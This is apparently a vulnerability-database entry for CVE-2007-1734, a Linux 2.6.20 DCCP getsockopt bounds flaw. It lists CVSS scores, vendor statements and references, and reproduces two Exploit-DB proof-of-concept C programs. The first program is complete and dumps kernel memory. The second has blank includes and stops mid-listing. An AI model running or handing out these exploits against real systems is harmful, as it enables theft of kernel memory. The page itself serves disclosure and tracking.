CVE-2007-1734
Published 2007-03-28
CVE-2007-1734: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later does not verify the upper bounds of the optlen value…
Priority P425 · high · 7.2 · CVSS 2.0
AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 0.73% (49.6th percentile)
The DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later does not verify the upper bounds of the optlen value, which allows local users running on certain architectures to read kernel memory or cause a denial of service (oops), a related issue to CVE-2007-1730.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
CVSS provenance
nvd · v2.0 · 7.2 HIGH · AV:L/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat · 6.6 MEDIUM
GHSA
GHSA-92h4-4w9c-9q5w: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto
ghsa_unreviewed · 2022-05-01 · CVSS 6.6 (MEDIUM)
Red Hat
CVE-2007-1734: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto
vendor_redhat · CVSS 6.6 (MEDIUM)
Statement: Not vulnerable. This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
No detection rules found.
Exploit-DB
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)
exploitdb · 2007-03-28
---
```c
/* Header names were lost from this listing; these are the headers the calls below require. */
#include <stdio.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

#define BUFSIZE 0x10000000

int main(int argc, char *argv[])
{
    void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
                     MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    if (mem == (void*)-1) {
        printf("Alloc failed\n");
        return -1;
    }

    /* SOCK_DCCP, IPPROTO_DCCP */
    int s = socket(PF_INET, 6, 33);
    if (s == -1) {
        fprintf(stderr, "socket failure!\n");
        return 1;
    }

    /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
    /* optlen is set to the whole buffer size; do_dccp_getsockopt does not
       check its upper bound, which is the flaw described above. */
    int len = BUFSIZE;
    int x = getsockopt(s, 269, 11, mem, &len);

    if (x == -1)
        perror("SETSOCKOPT");
    else
        printf("SUCCESS\n");

    write(1, mem, BUFSIZE);
    return 0;
}
// milw0rm.com [2007-03-28]
```
Exploit-DB
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)
exploitdb · 2007-03-27
---
```c
/*
Linux Kernel DCCP Memory Disclosure Vulnerability
Synopsis:
The Linux kernel is susceptible to a locally exploitable flaw
which may allow local users to steal data from the kernel memory.
Vulnerable Systems:
Linux Kernel Versions: >= 2.6.20 with DCCP support enabled.
Kernel versions
#include
#include
#include
#include
#include
#include
#define BUFSIZE 0x10000000
int main(int argc, char *argv[])
{
    void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
                     MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    if (!mem) {
        printf("Cannot allocate mem\n");
        return 1;
    }
    /* SOCK_DCCP, IPPROTO_DCCP */
    int s = socket(PF_INET, 6, 33);
    if (s == -1) {
        fprintf(stderr, "socket failure!\n");
        return 1;
    }
    int len = -1;
    /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV
```
No writeups or analysis indexed.
http://securityreason.com/securityalert/2511
http://www.securityfocus.com/archive/1/463969/100/0/threaded
http://www.securitytracker.com/id?1017820
https://exchange.xforce.ibmcloud.com/vulnerabilities/33274
https://exchange.xforce.ibmcloud.com/vulnerabilities/43321
Published 2007-03-28